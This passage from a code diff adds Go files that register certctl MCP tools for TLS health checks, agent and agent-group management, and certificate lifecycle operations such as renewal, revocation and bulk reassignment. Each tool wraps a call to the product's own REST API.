||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_health_check",
|
||||||
|
Description: "Get a single TLS endpoint health check (GET /api/v1/health-checks/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/health-checks/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_health_check",
|
||||||
|
Description: "Create a TLS endpoint health check (POST /api/v1/health-checks). Required: endpoint (host:port). Server-side defaults: check_interval_seconds=300, degraded_threshold=2, down_threshold=5.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/health-checks", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_health_check",
|
||||||
|
Description: "Update a TLS endpoint health check (PUT /api/v1/health-checks/{id}). The handler performs a merge update: non-zero numeric fields and non-empty strings overwrite, zero values preserve existing.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/health-checks/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_health_check",
|
||||||
|
Description: "Delete a TLS endpoint health check (DELETE /api/v1/health-checks/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/health-checks/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health_check_history",
|
||||||
|
Description: "Get probe history for a TLS endpoint health check (GET /api/v1/health-checks/{id}/history). Default limit 100; max 1000 (clamped server-side).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input HealthCheckHistoryInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Limit > 0 {
|
||||||
|
q.Set("limit", strconv.Itoa(input.Limit))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/health-checks/"+input.ID+"/history", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_acknowledge_health_check",
|
||||||
|
Description: "Acknowledge a TLS health-check incident (POST /api/v1/health-checks/{id}/acknowledge). Marks the check Acknowledged=true; the handler records the actor (defaults to 'unknown' if absent) for the audit trail.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AcknowledgeHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := struct {
|
||||||
|
Actor string `json:"actor,omitempty"`
|
||||||
|
}{Actor: input.Actor}
|
||||||
|
data, err := c.Post("/api/v1/health-checks/"+input.ID+"/acknowledge", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,266 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"net/url"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the agent-management MCP tool domain: per-agent
|
||||||
|
// CRUD + lifecycle (registerAgentTools — register / list / get /
|
||||||
|
// retire / heartbeat / poll / claim / verify / discoveries) and the
|
||||||
|
// agent-group surface (registerAgentGroupTools — group CRUD +
|
||||||
|
// membership). Phase G P1-33 (POST /api/v1/agents/{id}/discoveries)
|
||||||
|
// stays intentionally absent from the MCP surface per the comment
|
||||||
|
// in tools.go::RegisterTools — that endpoint is the
|
||||||
|
// machine-to-machine path agents use to push filesystem-scan
|
||||||
|
// reports, not an operator-driven flow worth exposing to LLM
|
||||||
|
// consumers.
|
||||||
|
|
||||||
|
// ── Agents ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAgentTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agents",
|
||||||
|
Description: "List all registered agents with status, OS, architecture, and version info.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_agent",
|
||||||
|
Description: "Get agent details including status, last heartbeat, OS, architecture, IP, and version.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_register_agent",
|
||||||
|
Description: "Register a new agent. Requires name and hostname. Returns 409 if an agent with the same name already exists.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RegisterAgentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/agents", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_heartbeat",
|
||||||
|
Description: "Send agent heartbeat with optional metadata (OS, architecture, IP, version). Returns 404 if agent not found.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input struct {
|
||||||
|
ID string `json:"id" jsonschema:"Agent ID"`
|
||||||
|
Version string `json:"version,omitempty" jsonschema:"Agent version"`
|
||||||
|
Hostname string `json:"hostname,omitempty" jsonschema:"Hostname"`
|
||||||
|
OS string `json:"os,omitempty" jsonschema:"Operating system"`
|
||||||
|
Architecture string `json:"architecture,omitempty" jsonschema:"CPU architecture"`
|
||||||
|
IPAddress string `json:"ip_address,omitempty" jsonschema:"IP address"`
|
||||||
|
}) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Version != "" {
|
||||||
|
body["version"] = input.Version
|
||||||
|
}
|
||||||
|
if input.Hostname != "" {
|
||||||
|
body["hostname"] = input.Hostname
|
||||||
|
}
|
||||||
|
if input.OS != "" {
|
||||||
|
body["os"] = input.OS
|
||||||
|
}
|
||||||
|
if input.Architecture != "" {
|
||||||
|
body["architecture"] = input.Architecture
|
||||||
|
}
|
||||||
|
if input.IPAddress != "" {
|
||||||
|
body["ip_address"] = input.IPAddress
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.ID+"/heartbeat", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_submit_csr",
|
||||||
|
Description: "Submit a PEM-encoded CSR from an agent for signing.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentCSRInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"csr_pem": input.CSRPEM}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
body["certificate_id"] = input.CertificateID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.AgentID+"/csr", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_pickup_certificate",
|
||||||
|
Description: "Agent picks up a signed certificate after CSR has been processed.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentPickupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.AgentID+"/certificates/"+input.CertID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_get_work",
|
||||||
|
Description: "Get pending work items (deployment jobs, AwaitingCSR jobs) for an agent.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.ID+"/work", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_report_job_status",
|
||||||
|
Description: "Agent reports completion or failure of an assigned job.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentJobStatusInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"status": input.Status}
|
||||||
|
if input.Error != "" {
|
||||||
|
body["error"] = input.Error
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.AgentID+"/jobs/"+input.JobID+"/status", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-004: soft-retirement. DELETE /api/v1/agents/{id} returns 200 on a
|
||||||
|
// fresh retire (body echoes retired_at/already_retired/cascade/counts),
|
||||||
|
// 204 on an idempotent retire of an already-retired agent (do() in
|
||||||
|
// client.go normalizes that to {"status":"deleted"}), 409 when downstream
|
||||||
|
// dependencies block the retire and force wasn't set, 403 on sentinel
|
||||||
|
// agents, or 400 when force=true was sent without a reason. The tool
|
||||||
|
// forwards the raw handler response so the LLM operator sees the
|
||||||
|
// dependency counts and can decide whether to retry with force=true.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_retire_agent",
|
||||||
|
Description: "Soft-retire an agent (DELETE /api/v1/agents/{id}). Sets retired_at + retired_reason on the row; the agent is filtered from the default listing and surfaces only via certctl_list_retired_agents. Default is a safety-gated soft-retire that returns 409 blocked_by_dependencies if the agent has active targets, active certificates, or pending jobs — the returned counts tell you what would be orphaned. Pass force=true to cascade through and retire those dependents too; force=true requires a non-empty reason (captured in the audit trail). Sentinel discovery agents (server-scanner, cloud-aws-sm, cloud-azure-kv, cloud-gcp-sm) cannot be retired — the handler returns 403 unconditionally. Idempotent: retrying on an already-retired agent returns 204 without side effects.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RetireAgentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
// Client-side mirror of the handler's ErrForceReasonRequired contract
|
||||||
|
// (see internal/api/handler/agents.go) so the LLM gets an immediate,
|
||||||
|
// actionable error instead of a round-trip 400. Whitespace-only
|
||||||
|
// reasons are treated as empty — matches handler's TrimSpace check.
|
||||||
|
if input.Force && input.Reason == "" {
|
||||||
|
return errorResult(fmt.Errorf("reason is required when force=true"))
|
||||||
|
}
|
||||||
|
query := url.Values{}
|
||||||
|
if input.Force {
|
||||||
|
query.Set("force", "true")
|
||||||
|
}
|
||||||
|
if input.Reason != "" {
|
||||||
|
query.Set("reason", input.Reason)
|
||||||
|
}
|
||||||
|
data, err := c.DeleteWithQuery("/api/v1/agents/"+input.ID, query)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-004: retired agents are filtered out of GET /api/v1/agents by default.
|
||||||
|
// The /agents/retired endpoint is the opt-in view — same pagination shape
|
||||||
|
// as the default listing, but filters to rows where retired_at IS NOT NULL.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_retired_agents",
|
||||||
|
Description: "List soft-retired agents (GET /api/v1/agents/retired). These are agents that have been retired via certctl_retire_agent; retired_at and retired_reason are populated. Returned separately from certctl_list_agents so the default listing stays focused on operational agents.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/retired", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Agent Groups ────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAgentGroupTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agent_groups",
|
||||||
|
Description: "List agent groups with dynamic matching criteria (OS, architecture, IP CIDR, version).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_agent_group",
|
||||||
|
Description: "Get agent group details including matching criteria.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_agent_group",
|
||||||
|
Description: "Create a new agent group with dynamic matching criteria. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateAgentGroupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/agent-groups", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_agent_group",
|
||||||
|
Description: "Update an agent group's name, description, or matching criteria.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateAgentGroupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/agent-groups/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_agent_group",
|
||||||
|
Description: "Delete an agent group.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/agent-groups/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agent_group_members",
|
||||||
|
Description: "List agents that are members of a group (by dynamic criteria and manual membership).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups/"+input.ID+"/members", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,404 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern. Package
|
||||||
|
// stays `mcp`; every external caller of RegisterTools(...) resolves
|
||||||
|
// the same way — pure mechanical relocation. The dispatcher in
|
||||||
|
// tools.go still calls registerCertificateTools / registerCRLOCSPTools
|
||||||
|
// / registerRenewalPolicyTools / registerVerificationTools in the
|
||||||
|
// same order, just from this file.
|
||||||
|
//
|
||||||
|
// This file groups the certificate-lifecycle MCP tool domain:
|
||||||
|
// certificate CRUD + revocation (registerCertificateTools), CRL/OCSP
|
||||||
|
// surface (registerCRLOCSPTools), renewal-policy management
|
||||||
|
// (registerRenewalPolicyTools — Phase C of the 2026-05-05 parity
|
||||||
|
// audit), and certificate-verification tooling (registerVerificationTools
|
||||||
|
// — Phase G P1-32/P1-34/P1-35 of the same audit). Co-locating these
|
||||||
|
// four register-functions matches the operator-mental-model boundary
|
||||||
|
// (everything a certificate-administrator touches in one file) and
|
||||||
|
// pre-dates the Sprint 10 split — tools_audit_fix.go + tools_auth.go +
|
||||||
|
// tools_auth_bundle2.go + tools_est.go already follow the same
|
||||||
|
// sibling-file convention.
|
||||||
|
|
||||||
|
// ── Certificates ────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerCertificateTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificates",
|
||||||
|
Description: "List managed certificates with optional filters for status, environment, owner, team, and issuer. Returns paginated results.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.Environment != "" {
|
||||||
|
q.Set("environment", input.Environment)
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
q.Set("owner_id", input.OwnerID)
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
q.Set("team_id", input.TeamID)
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
q.Set("issuer_id", input.IssuerID)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/certificates", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_certificate",
|
||||||
|
Description: "Get a specific certificate by ID. Returns full certificate details including status, expiry, owner, and tags.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_certificate",
|
||||||
|
Description: "Create a new managed certificate. Requires name, common_name, renewal_policy_id, issuer_id, owner_id, and team_id.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/certificates", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_certificate",
|
||||||
|
Description: "Update an existing certificate's metadata (name, environment, owner, tags, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/certificates/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_archive_certificate",
|
||||||
|
Description: "Archive (soft-delete) a certificate by ID.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/certificates/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificate_versions",
|
||||||
|
Description: "List all versions (renewals) of a certificate. Shows serial numbers, validity periods, and fingerprints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListVersionsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID+"/versions", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_renewal",
|
||||||
|
Description: "Trigger immediate renewal of a certificate. Creates a renewal job (async, returns 202). Returns 404 if certificate not found, 400 if certificate is archived/expired, 409 if renewal already in progress.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/renew", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_deployment",
|
||||||
|
Description: "Trigger deployment of a certificate to its targets. Optionally specify a single target.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TriggerDeploymentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.TargetID != "" {
|
||||||
|
body["target_id"] = input.TargetID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/deploy", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_revoke_certificate",
|
||||||
|
Description: "Revoke a certificate with an optional RFC 5280 reason code. Records in audit trail and notifies the issuer.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RevokeCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Reason != "" {
|
||||||
|
body["reason"] = input.Reason
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/revoke", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_revoke_certificates",
|
||||||
|
Description: "Bulk revoke certificates matching filter criteria. At least one criterion (profile_id, owner_id, agent_id, issuer_id, team_id, or certificate_ids) is required. Returns counts of matched, revoked, skipped, and failed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkRevokeCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{
|
||||||
|
"reason": input.Reason,
|
||||||
|
}
|
||||||
|
if input.ProfileID != "" {
|
||||||
|
body["profile_id"] = input.ProfileID
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
body["owner_id"] = input.OwnerID
|
||||||
|
}
|
||||||
|
if input.AgentID != "" {
|
||||||
|
body["agent_id"] = input.AgentID
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
body["issuer_id"] = input.IssuerID
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
if len(input.CertificateIDs) > 0 {
|
||||||
|
body["certificate_ids"] = input.CertificateIDs
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-revoke", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// L-1 master closure (cat-l-fa0c1ac07ab5): bulk-renew MCP tool.
|
||||||
|
// Mirrors certctl_bulk_revoke_certificates shape sans the Reason
|
||||||
|
// field. Server returns total_matched / total_enqueued /
|
||||||
|
// total_skipped / total_failed plus per-cert {certificate_id,
|
||||||
|
// job_id} pairs in enqueued_jobs.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_renew_certificates",
|
||||||
|
Description: "Bulk renew certificates matching filter criteria (profile_id, owner_id, agent_id, issuer_id, team_id) or an explicit certificate_ids list. At least one selector required. Returns counts of matched, enqueued, skipped, and failed certificates plus per-cert {certificate_id, job_id} pairs.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkRenewCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{}
|
||||||
|
if input.ProfileID != "" {
|
||||||
|
body["profile_id"] = input.ProfileID
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
body["owner_id"] = input.OwnerID
|
||||||
|
}
|
||||||
|
if input.AgentID != "" {
|
||||||
|
body["agent_id"] = input.AgentID
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
body["issuer_id"] = input.IssuerID
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
if len(input.CertificateIDs) > 0 {
|
||||||
|
body["certificate_ids"] = input.CertificateIDs
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-renew", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// L-2 closure (cat-l-8a1fb258a38a): bulk-reassign MCP tool.
|
||||||
|
// Narrower than bulk-renew/revoke — IDs-only, no criteria-mode.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_reassign_certificates",
|
||||||
|
Description: "Bulk reassign owner (and optionally team) for a set of certificates. owner_id is required. team_id is optional and updates only when non-empty. Returns counts of matched, reassigned, skipped (already-owned-by-target), and failed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkReassignCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{
|
||||||
|
"certificate_ids": input.CertificateIDs,
|
||||||
|
"owner_id": input.OwnerID,
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-reassign", body)
|
||||||
|
if err != nil {
|
||||||
|
